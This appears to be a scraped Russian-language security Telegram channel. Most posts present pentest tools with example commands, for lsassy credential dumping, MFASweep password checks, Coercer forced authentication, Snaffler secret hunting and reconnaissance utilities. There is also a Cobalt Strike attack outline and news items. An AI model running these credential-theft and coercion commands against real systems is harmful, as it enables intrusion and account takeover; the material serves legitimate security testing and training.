lsassy — инструмент, написанный на Python для удалённого извлечения учётных данных на нескольких хостах. Он использует проект impacket для удалённого считывания необходимых байтов в дампе lsass и pypykatz для извлечения учётных данных.
🐍 Установка производится в одну команду
😮 Поддерживает различные методы дампа: comsvcs, comsvcs_stealth, dllinject, dumpert, dumpertdll, edrsandblast, mirrordump, mirrordump_embedded, nanodump, nanodump_ssp_embedded, ppldump, ppldump_embedded, procdump, procdump_embedded, rawrpc, rawrpc_embedded, rdrleakdiag, silentprocessexit, sqldumper, wer.
🔑 Аутентификация возможна через хеш (-H), по билету (-k) и паролю (-p). Для успешной работы утилиты у пользователя должны быть права локального администратора на удалённых устройствах.
В качестве цели могут быть указаны ip адреса, диапазон адресов, CIDR, hostname, FQDN, файл.
Для некоторых методов, например, procdump требуются параметры, которые передаются через -O, в них указывается путь к procdump.
C помощью инструмента можно собирать билеты Kerberos (после -K передаем путь для сохранения тикетов).
Сбор ключей DPAPI (после -M указываем путь для сохранения).
python3 -m pip install lsassy
В качестве цели могут быть указаны ip адреса, диапазон адресов, CIDR, hostname, FQDN, файл.
lsassy -d dom.lab -u user -p pass 192.168.1.0/24
Для некоторых методов, например, procdump требуются параметры, которые передаются через -O, в них указывается путь к procdump.
lsassy -d hackn.lab -u user -p pass dc.dom.lab -m procdump -O procdump_path=/opt/Sysinternals/procdump.exe
C помощью инструмента можно собирать билеты Kerberos (после -K передаем путь для сохранения тикетов).
lsassy -d hackn.lab -u user -p pass dc.dom.lab -K '/tmp/kerberos_tickets'
Сбор ключей DPAPI (после -M указываем путь для сохранения).
lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab -M '/tmp/keys.txt'
Please open Telegram to view this post
VIEW IN TELEGRAM
❤20👍9🔥8
X8
Инструмент помогает идентифицировать скрытые параметры, которые потенциально могут быть уязвимы или раскрывать интересную функциональность, которую могут пропустить другие тестировщики. Его высокая точность достигается за счет построчного сравнения страниц, сравнения кодов ответов и отражений.
Преимущества:
1️⃣ Быстро.
2️⃣ Предлагает гибкую конфигурацию запросов за счет использования шаблонов и точек внедрения.
3️⃣ Высокая масштабируемость, возможность проверки тысяч URL-адресов за один запуск.
4️⃣ Обеспечивает более высокую точность по сравнению с аналогичными инструментами, особенно в сложных случаях.
5️⃣ Способность обнаруживать параметры с неслучайными значениями, такими как admin=true.
6️⃣ Высокая настраиваемость с широким диапазоном настраиваемых параметров.
7️⃣ Достигает почти необработанных запросов за счет модификации внешней библиотеки
💡 Примеры использования:
✔️ Проверить параметры в запросе
✔️ Отправить параметр в теле
или с уникальным телом
📌 Ссылка на утилиту: https://github.com/Sh1Yo/x8
Инструмент помогает идентифицировать скрытые параметры, которые потенциально могут быть уязвимы или раскрывать интересную функциональность, которую могут пропустить другие тестировщики. Его высокая точность достигается за счет построчного сравнения страниц, сравнения кодов ответов и отражений.
Преимущества:
x8 -u "https://example.de/" -w [PATH_TO_WORDLIST]
x8 -u "https://example.de/" -X POST -w [PATH_TO_WORDLIST]
или с уникальным телом
x8 -u "https://example.de/" -X POST -b '{"x":{%s}}' -w [PATH_TO_WORDLIST]
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - Sh1Yo/x8: Hidden parameters discovery suite
Hidden parameters discovery suite. Contribute to Sh1Yo/x8 development by creating an account on GitHub.
👍17🔥9❤8
Google тайно установил приложение, которое сканирует фото на вашем смартфоне 👀
Пользователи Android внезапно обнаружили на своих устройствах новое системное приложение — Android System SafetyCore. Оно устанавливается без согласия пользователей и работает в фоновом режиме.
После паники в интернете Google спустя несколько дней всё-таки подтвердил, что это приложение анализирует изображения в Google Messages и скрывает откровенный контент.
Что именно делает SafetyCore?
🔸 Приложение автоматически сканирует изображения в Google Messages на наличие 18+ контента.
🔸 Если обнаружен откровенный снимок, он размывается (блюрится) и появляется предупреждение.
🔸 Google заявляет, что вся обработка происходит на устройстве и файлы не загружаются в облако.
Почему пользователи возмущены?
1️⃣ Приложение установилось скрытно.
Google даже не уведомил пользователей о том, что добавляет новую систему сканирования изображений. Просто однажды люди заметили у себя на телефонах приложение, которое они не устанавливали.
2️⃣ Жрёт ресурсы.
SafetyCore требует около 2 ГБ оперативной памяти, что делает его непригодным для слабых смартфонов. Владельцы бюджетных Android-устройств уже жалуются на лаги и подвисания.
3️⃣ Кому-то это нужно?
Приложение работает только в Google Messages, а этот мессенджер почти никто не использует. Но Google всё равно принудительно загнал SafetyCore на миллионы устройств.
4️⃣ Сегодня не отправляет, а завтра?
Google уверяет, что фото остаются на устройстве и не передаются в облако. Но многие пользователи не верят в это. Уже сейчас компания собирает кучу данных о пользователях для таргетированной рекламы.
5️⃣ Что, если ИИ ошибётся?
Блюрятся только "откровенные" фото? А если система решит, что что-то на вашей картинке — это "неподобающий контент"? У Google уже были проблемы с алгоритмами, которые ошибочно блокировали пользователей и контент.
Google снова тестирует границы дозволенного. Как вам такое обновление?
#новости
Пользователи Android внезапно обнаружили на своих устройствах новое системное приложение — Android System SafetyCore. Оно устанавливается без согласия пользователей и работает в фоновом режиме.
После паники в интернете Google спустя несколько дней всё-таки подтвердил, что это приложение анализирует изображения в Google Messages и скрывает откровенный контент.
Что именно делает SafetyCore?
Почему пользователи возмущены?
Google даже не уведомил пользователей о том, что добавляет новую систему сканирования изображений. Просто однажды люди заметили у себя на телефонах приложение, которое они не устанавливали.
SafetyCore требует около 2 ГБ оперативной памяти, что делает его непригодным для слабых смартфонов. Владельцы бюджетных Android-устройств уже жалуются на лаги и подвисания.
Приложение работает только в Google Messages, а этот мессенджер почти никто не использует. Но Google всё равно принудительно загнал SafetyCore на миллионы устройств.
Google уверяет, что фото остаются на устройстве и не передаются в облако. Но многие пользователи не верят в это. Уже сейчас компания собирает кучу данных о пользователях для таргетированной рекламы.
Блюрятся только "откровенные" фото? А если система решит, что что-то на вашей картинке — это "неподобающий контент"? У Google уже были проблемы с алгоритмами, которые ошибочно блокировали пользователей и контент.
Google снова тестирует границы дозволенного. Как вам такое обновление?
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍29🤯11❤6😡5🤔4🔥3😱1
Исследователи Reversing Labs обнаружили две вредоносные ML-модели на Hugging Face, крупнейшей платформе для обмена AI-моделями. Несмотря на наличие в них вредоносного кода, инструменты безопасности Hugging Face не отметили их как «опасные».
❓ Как работает атака?
Злоумышленники использовали уязвимость Pickle-файлов – формата сериализации в Python, который может исполнять код во время загрузки модели. Хотя вредоносные Pickle-файлы встречаются не впервые, исследователи выявили новую технику обхода защиты Picklescan – сканера, используемого Hugging Face для выявления угроз.
🔍 Метод nullifAI
Атакующие упаковали модели в формате PyTorch, но вместо стандартного ZIP использовали 7z, что сделало их невидимыми для Picklescan. Более того, файлы содержали «сломанные» Pickle-инструкции, из-за чего сканер не мог их корректно проверить.
💡 Проблемы в безопасности Hugging Face
Эксперты считают, что Hugging Face полагается на черный список опасных функций, что не защищает от новых угроз. Picklescan проверяет Pickle-файлы перед анализом, но сам механизм десериализации исполняет команды по мере их считывания. Вредоносный код в начале потока может обойти защиту и остаться незамеченным.
Если вы работаете с AI-моделями, избегайте загрузки Pickle-файлов из непроверенных источников. Атаки на ML-платформы становятся все изощреннее — будьте внимательны!
#новости
Злоумышленники использовали уязвимость Pickle-файлов – формата сериализации в Python, который может исполнять код во время загрузки модели. Хотя вредоносные Pickle-файлы встречаются не впервые, исследователи выявили новую технику обхода защиты Picklescan – сканера, используемого Hugging Face для выявления угроз.
Атакующие упаковали модели в формате PyTorch, но вместо стандартного ZIP использовали 7z, что сделало их невидимыми для Picklescan. Более того, файлы содержали «сломанные» Pickle-инструкции, из-за чего сканер не мог их корректно проверить.
Эксперты считают, что Hugging Face полагается на черный список опасных функций, что не защищает от новых угроз. Picklescan проверяет Pickle-файлы перед анализом, но сам механизм десериализации исполняет команды по мере их считывания. Вредоносный код в начале потока может обойти защиту и остаться незамеченным.
🗣️ Reversing Labs сообщили о проблеме в службу безопасности Hugging Face. Модели удалили в течение 24 часов, а Picklescan обновили, чтобы он мог обнаруживать угрозы в «сломанных» Pickle-файлах.
Если вы работаете с AI-моделями, избегайте загрузки Pickle-файлов из непроверенных источников. Атаки на ML-платформы становятся все изощреннее — будьте внимательны!
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
50👍18🔥8❤6😁2
MFASweep — PowerShell скрипт, пытающийся выполнить вход в различные службы Microsoft, используя предоставленные учётные данные, и определяет, включена ли многофакторная аутентификация. Он также выполняет дополнительную проверку конфигурации ADFS. По умолчанию скрипт пытается войти в указанную учётную запись десять раз.
👀 Имеется возможность входа в следующие сервисы:
⏺️ Microsoft Graph API (
⏺️ Azure Service Management API (
⏺️ Microsoft 365 Exchange Web Services (
⏺️ Microsoft 365 Web Portal (
⏺️ Microsoft 365 Active Sync (
⏺️ ADFS (
💡 Примеры использования:
Команда будет пытаться войти во все сервисы кроме ADFS. При успешном входе токены и/или файлы cookie будут записаны в AccessTokens.json.
Команда работает с с методами аутентификации по умолчанию и проверяет наличие ADFS.
Команда будет перебирать различные типы ресурсов и идентификаторы клиентов во время аутентификации ROPC, чтобы найти однофакторный доступ для различных комбинаций идентификаторов клиентов и ресурсов.
Invoke-GraphAPIAuth
)Invoke-AzureManagementAPIAuth
)Invoke-EWSAuth
)Invoke-O365WebPortalAuth
)Invoke-O365ActiveSyncAuth
)Invoke-ADFSAuth
)Команда будет пытаться войти во все сервисы кроме ADFS. При успешном входе токены и/или файлы cookie будут записаны в AccessTokens.json.
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2025 -WriteTokens
Команда работает с с методами аутентификации по умолчанию и проверяет наличие ADFS.
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2025 -Recon -IncludeADFS
Команда будет перебирать различные типы ресурсов и идентификаторы клиентов во время аутентификации ROPC, чтобы найти однофакторный доступ для различных комбинаций идентификаторов клиентов и ресурсов.
Invoke-BruteClientIDs -Username targetuser@targetdomain.com -Password Winter2025 -WriteTokens
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤6🔥6
AD: как работает, как ломают и как защитить? Разбираемся в карточках.
➡️ Новый поток курса по Active Directory стартует 3 марта. Попробуйте взлом и защиту на практике в нашей лаборатории. Регистрация
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥9❤6🤨4
Как обнаружить скрытые угрозы в вашей сети с помощью Nessus
Функции Nessus
⌨️ Проверяет системы на наличие известных угроз, таких как ошибки конфигурации и устаревшие версии ПО.
⌨️ Работает с Windows, Linux, macOS и сетевыми устройствами.
⌨️ Обновляемая база плагинов позволяет находить даже новые уязвимости.
⌨️ Удобный веб-интерфейс для настройки сканирования и просмотра отчетов.
Пример использования Nessus через CLI
1️⃣ Установка на Linux Nessus
2️⃣ Запуск
Затем перейдите по адресу https://localhost:8834 для настройки через веб-интерфейс.
3️⃣ Аутентификация через CLI
4️⃣ Запуск сканирования
5️⃣ Просмотр результатов
⌨️ Преимущества Nessus
⌨️ Регулярные обновления плагинов позволяют находить новые уязвимости.
⌨️ Поддерживает различные операционные системы и сетевые устройства.
⌨️ Недостатки Nessus
⌨️ Для полной функциональности нужна платная лицензия.
⌨️ При сканировании больших сетей может сильно нагружать ресурсы.
Nessus — это популярный инструмент для сканирования уязвимостей, разработанный компанией Tenable, который направлен на выявление слабых мест в системах и сетях, предотвращая возможные атаки.
Функции Nessus
Пример использования Nessus через CLI
sudo apt install nessus
sudo systemctl start nessusd
Затем перейдите по адресу https://localhost:8834 для настройки через веб-интерфейс.
nessuscli login -u <username> -p <password>
nessuscli scan --name "Network Scan" --targets "192.168.1.0/24" --policy "basic-network-scan"
nessuscli report --scan-id <scan_id>
Please open Telegram to view this post
VIEW IN TELEGRAM
200👍20❤7🔥6
Coercer — скрипт на Python для автоматического принуждения сервера Windows к аутентификации на произвольном компьютере с помощью множества методов. Установка осуществляется с помощью команды
3 режима работы:
⏺️ scan - проверка методов с известными рабочими путями для всех методов;
⏺️ coerce - запуск принудительной аутентификации через все известные методы с известными рабочими путями. В данном режим на своей машине также необходимо запустить responder;
⏺️ fuzz - проверка каждого метода со списком путей эксплойта.
💻 Примеры использования:
Анализ удалённых процедур на компьютере, чтобы понять, можно ли использовать их для принудительной аутентификации. Целевой хост передается через -t.
Использование вызовов удалённых процедур на удалённом компьютере, чтобы принудительно выполнить аутентификацию. Для вызова принудительной аутентификации Kerberos вместо адреса хоста нужно указывать его имя. Флагом -l указывается листенер на котором запущен responder.
Прослушивание вызовов удалённых процедур на компьютере с разными путями.
python3 -m pip install coercer
.3 режима работы:
Анализ удалённых процедур на компьютере, чтобы понять, можно ли использовать их для принудительной аутентификации. Целевой хост передается через -t.
coercer scan -u user -p pass -t 10.0.0.8 -v
Использование вызовов удалённых процедур на удалённом компьютере, чтобы принудительно выполнить аутентификацию. Для вызова принудительной аутентификации Kerberos вместо адреса хоста нужно указывать его имя. Флагом -l указывается листенер на котором запущен responder.
coercer coerce -u user -p pass -l 10.0.0.80 -t 10.0.0.8 --always-continue
Прослушивание вызовов удалённых процедур на компьютере с разными путями.
coercer fuzz -u user -p pass -t 10.0.0.8 -v
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18❤7🔥5
mitmproxy2swagger — утилита для автоматического преобразования захваченного трафика через mitmproxy в OpenAPI Specification. Установка происходит через
Использование
1️⃣ Для создания спецификации сначала запускаем mitmweb — веб-интерфейс, встроенный в mitmproxy, с помощью команды
2️⃣ Изучаем наш целевой сайт, самостоятельно переходим на разные эндпоинты, генерируя трафик. Далее необходимо сохранить полученные пакеты в файл и запустить команду:
<api_prefix> Это базовый URL-адрес API, который мы хотим проанализировать.
3️⃣ При выполнении первого прохода в файле схемы появляются эндпоинты API, которые удалось вычленить из файла, с префиксом ignore. Его необходимо удалить и запустить второй проход, тем самым сгенерировав описания конечных точек:
4️⃣ Финальный шаг — скопировать полученное описание в swagger для получения удобочитаемой документации.
‼️ Удобным является поддержка в mitmproxy2swagger формата har. Можно также осуществить взаимодействие с целевым веб-сайтом и экспортировать трафик из браузера DevTools на вкладке Network и проделать шаги 2-4.
pip3 install mitmproxy2swagger
или docker:git clone git@github.com:alufers/mitmproxy2swagger.git
cd mitmproxy2swagger
docker build -t mitmproxy2swagger .
Использование
mitmweb
. Теперь необходимо настроить браузер, чтобы весь трафик проходил через mitmproxy.mitmproxy2swagger -i <path_to_mitmptoxy_file> -o <path_to_output_schema> -p <api_prefix>
<api_prefix> Это базовый URL-адрес API, который мы хотим проанализировать.
mitmproxy2swagger -i <path_to_mitmptoxy_file> -o <path_to_output_schema> -p <api_prefix>
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥8❤4
🔮Kismet: Магия Wi-Fi анализа для хакеров и исследователей
Kismet — это мощный анализатор сети Wi-Fi с открытым исходным кодом, который позволяет исследовать и отслеживать радиочастотное пространство.
С помощью Kismet можно не только анализировать трафик, но и заниматься разведкой на более глубоком уровне, включая мониторинг нестандартных частот и анализ помех.
1️⃣ Установка
Для начала вам нужно установить Kismet. Процесс зависит от операционной системы. Например, на Linux:
После установки убедитесь, что ваше устройство поддерживает мониторинг беспроводных сетей. Например, для некоторых карт потребуется установка дополнительных драйверов.
2️⃣ Запуск программы
Откройте терминал и запустите Kismet:
Программа откроется в текстовом интерфейсе, где вам предстоит настроить параметры.
3️⃣ Сканирование сетей
После запуска Kismet начнёт сканировать все доступные Wi-Fi сети вокруг вас. Он покажет вам список точек доступа, включая их SSID (имя сети), MAC-адреса, каналы и типы шифрования.
В Kismet также отображаются скрытые сети, которые не транслируют свои имена, но всё равно могут быть обнаружены.
4️⃣ Анализ пакетов
Kismet позволяет вам «ловить» пакеты, передаваемые через эти сети. Вы можете увидеть, какие данные проходят через вашу сеть, а также анализировать их для потенциальных уязвимостей.
Для анализа трафика достаточно запустить захват пакетов. После этого вы сможете увидеть различные данные, включая протоколы, используемые в передаче, количество переданных байтов и другие характеристики.
🧙Пример использования
Если вы подозреваете, что кто-то подключился к вашей сети, используйте Kismet:
1️⃣ Запустите Kismet и начните сканирование.
2️⃣ Выберите вашу сеть и просмотрите список подключённых устройств.
3️⃣ Проверьте MAC-адреса на наличие незнакомых устройств.
Kismet — это мощный анализатор сети Wi-Fi с открытым исходным кодом, который позволяет исследовать и отслеживать радиочастотное пространство.
С помощью Kismet можно не только анализировать трафик, но и заниматься разведкой на более глубоком уровне, включая мониторинг нестандартных частот и анализ помех.
Для начала вам нужно установить Kismet. Процесс зависит от операционной системы. Например, на Linux:
sudo apt-get install kismet
После установки убедитесь, что ваше устройство поддерживает мониторинг беспроводных сетей. Например, для некоторых карт потребуется установка дополнительных драйверов.
Откройте терминал и запустите Kismet:
sudo kismet
Программа откроется в текстовом интерфейсе, где вам предстоит настроить параметры.
После запуска Kismet начнёт сканировать все доступные Wi-Fi сети вокруг вас. Он покажет вам список точек доступа, включая их SSID (имя сети), MAC-адреса, каналы и типы шифрования.
В Kismet также отображаются скрытые сети, которые не транслируют свои имена, но всё равно могут быть обнаружены.
Kismet позволяет вам «ловить» пакеты, передаваемые через эти сети. Вы можете увидеть, какие данные проходят через вашу сеть, а также анализировать их для потенциальных уязвимостей.
Для анализа трафика достаточно запустить захват пакетов. После этого вы сможете увидеть различные данные, включая протоколы, используемые в передаче, количество переданных байтов и другие характеристики.
🧙Пример использования
Если вы подозреваете, что кто-то подключился к вашей сети, используйте Kismet:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20🔥10❤7⚡1
В ближайшие месяцы ИБ-специалисты смогут посетить ряд значимых для комьюнити мероприятий. Представляем подборку из пяти крупных конференций:
1️⃣ ИБ АСУ ТП КВО 2025
➡️ Дата: 4–5 марта 2025 года
➡️ Место: Москва, ул. Вильгельма Пика, 16, Soluxe Hotel Moscow 5*
Мероприятие по защите автоматизированных систем управления технологическими процессами (АСУ ТП). Ведущие специалисты обсудят актуальные угрозы, регуляторные требования и лучшие практики безопасности. 35 докладчиков, 500 делегатов и 700 участников.
🔴 Подробнее
2️⃣ AppSecFest 2025
➡️ Дата: 25 апреля 2025 года
➡️ Место: Алматы, Казахстан
Конференция по безопасности веб- и мобильных приложений, DevSecOps и современным методам защиты ПО. В программе — разбор актуальных атак, мастер-классы и выступления ведущих экспертов.
🔴 Подробнее
3️⃣ ИНФОФОРУМ-Тюмень 2025
➡️ 22–25 апреля 2025
➡️ г. Тюмень, Тюменский Технопарк
Первая межрегиональная конференция по информационной безопасности в Уральском федеральном округе объединит ведущих специалистов в сфере ИБ, представителей госструктур, бизнеса и разработчиков технологий для обсуждения киберугроз, защиты критической инфраструктуры и импортозамещения в отрасли.
🔴 Подробнее
4️⃣ Positive Hack Days (PHDays) 2025
➡️ Дата: 22-24 мая 2025 года
➡️ Место: Москва, "Лужники"
Один из крупнейших форумов по кибербезопасности в России. В программе: кибербитвы, практические воркшопы, презентации от международных и российских экспертов.
🔴 Подробнее
5️⃣ ЦИПР 2025 (Цифровая индустрия промышленной России)
➡️ Дата: 3–6 июня 2025 года
➡️ Место: Нижний Новгород, Россия
Форум о цифровой трансформации и информационной безопасности в промышленности и госсекторе. В центре внимания — импортозамещение, защита критической инфраструктуры и развитие отечественного ИБ-рынка.
🔴 Подробнее
А на какие пойдете вы? Пишите в комментариях!
Мероприятие по защите автоматизированных систем управления технологическими процессами (АСУ ТП). Ведущие специалисты обсудят актуальные угрозы, регуляторные требования и лучшие практики безопасности. 35 докладчиков, 500 делегатов и 700 участников.
Конференция по безопасности веб- и мобильных приложений, DevSecOps и современным методам защиты ПО. В программе — разбор актуальных атак, мастер-классы и выступления ведущих экспертов.
Первая межрегиональная конференция по информационной безопасности в Уральском федеральном округе объединит ведущих специалистов в сфере ИБ, представителей госструктур, бизнеса и разработчиков технологий для обсуждения киберугроз, защиты критической инфраструктуры и импортозамещения в отрасли.
Один из крупнейших форумов по кибербезопасности в России. В программе: кибербитвы, практические воркшопы, презентации от международных и российских экспертов.
Форум о цифровой трансформации и информационной безопасности в промышленности и госсекторе. В центре внимания — импортозамещение, защита критической инфраструктуры и развитие отечественного ИБ-рынка.
А на какие пойдете вы? Пишите в комментариях!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14🔥14❤7
Скачать скомпилированный инструмент можно по ссылке.
snaffler.exe -s -o snaffler.log
Эти правила могут быть очень простыми, например: "если расширение файла — .kdbx, сообщить об этом" или "если путь содержит windows\sxs, прекратить поиск подкаталогов и файлов в этом пути". В правилах также могут использоваться регулярные выражения, которые позволяют выполнять относительно сложные операции сопоставления с образцом.
🪄 Особенность инструмента заключается в объединении нескольких правил в цепочки и создание разветвлённых цепочек. Именно это позволяет Snaffler выполнять довольно глубокую проверку файлов там, где это необходимо, и при этом работать достаточно быстро.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤6🔥6
Cobalt Strike: Шахматная доска для хакеров — играем по-крупному
Методика работы Cobalt Strike
Cobalt Strike позволяет создавать и управлять «бэкдорами», через которые злоумышленник может получать доступ к системе.
➡️ Основные шаги работы с фреймворком:
1️⃣ Получение начального доступа - через фишинг или эксплойт скомпрометированная система получает агент Beacon.
2️⃣ Командование через Beacon - Beacon устанавливает скрытный канал связи с командным сервером атакующего.
3️⃣ Расширение контроля - атакующий может использовать различные техники для перемещения по сети (например, Pass-the-Hash) и получения прав администратора.
4️⃣ Эксфильтрация данных - в конце можно скачать конфиденциальные данные или выполнить другие действия по распоряжению.
➡️ Пример использования Cobalt Strike
Представим пентест в организации, где исследуется безопасность сети.
1️⃣ Атакующий отправляет фишинговые письма с вложением, которое, при открытии, заражает компьютер жертвы пейлоадом Beacon.
2️⃣ Beacon связывается с сервером атакующего, давая ему возможность удалённо управлять системой.
3️⃣ Злоумышленник использует Pass-the-Hash, чтобы получить доступ к другим компьютерам в сети и повысить свои привилегии.
4️⃣ В конце пентестеры могут продемонстрировать, как злоумышленник скачивает базу данных с паролями или другую конфиденциальную информацию.
Cobalt Strike — это фреймворк для постэксплуатации, который используется для имитации атак с целью проверки защиты систем. Его цель — помочь профессионалам эффективно воспроизводить реальные угрозы и тестировать защитные механизмы.
Методика работы Cobalt Strike
Cobalt Strike позволяет создавать и управлять «бэкдорами», через которые злоумышленник может получать доступ к системе.
Представим пентест в организации, где исследуется безопасность сети.
Please open Telegram to view this post
VIEW IN TELEGRAM
50👍28❤7🔥7
Sublist3r: Охота на скрытые субдомены
Необходимо установить Sublist3r. Он написан на Python, поэтому важно иметь установленный Python 3.x.
1️⃣ Установка зависимостей
Для начала нужно клонировать репозиторий Sublist3r с GitHub:
2️⃣ Установка зависимостей
Sublist3r использует несколько Python-библиотек. Чтобы установить все зависимости, выполните:
3️⃣ Запуск поиска субдоменов
Теперь, когда все настроено, можно начать сканирование. Для этого нужно указать домен, который вас интересует. Пример:
Команда выполнит поиск субдоменов для домена example.com.
4️⃣ Использование дополнительных опций
Sublist3r имеет множество параметров, например:
- -o — для вывода результатов в файл.
- -p — чтобы указать количество потоков для ускорения поиска.
- -t — для указания времени ожидания.
Пример с несколькими опциями
Запрос найдет субдомены для example.com, выведет их в файл output.txt и использует 50 потоков для более быстрой обработки.
Недостатки Sublist3r
1️⃣ Зависимость от сервисов — блокировки или ограничения могут снизить точность.
2️⃣ Ограниченная точность — не все субдомены индексируются.
3️⃣ Лимиты API — ограничение запросов замедляет работу.
4️⃣ Скорость — зависимость от сторонних сервисов может замедлить поиск.
5️⃣ Отсутствие аналитики — инструмент только находит субдомены, не анализируя их безопасность.
Sublist3r — это инструмент с открытым исходным кодом, предназначенный для поиска субдоменов доменов, помогает обнаружить скрытые поддомены, которые могут быть уязвимыми или предоставлять информацию о структуре веб-приложений.
Необходимо установить Sublist3r. Он написан на Python, поэтому важно иметь установленный Python 3.x.
Для начала нужно клонировать репозиторий Sublist3r с GitHub:
git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r
Sublist3r использует несколько Python-библиотек. Чтобы установить все зависимости, выполните:
pip3 install -r requirements.txt
Теперь, когда все настроено, можно начать сканирование. Для этого нужно указать домен, который вас интересует. Пример:
python3 sublist3r.py -d example.com
Команда выполнит поиск субдоменов для домена example.com.
Sublist3r имеет множество параметров, например:
- -o — для вывода результатов в файл.
- -p — чтобы указать количество потоков для ускорения поиска.
- -t — для указания времени ожидания.
Пример с несколькими опциями
python3 sublist3r.py -d example.com -o output.txt -p 50
Запрос найдет субдомены для example.com, выведет их в файл output.txt и использует 50 потоков для более быстрой обработки.
Недостатки Sublist3r
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤6🔥4❤🔥2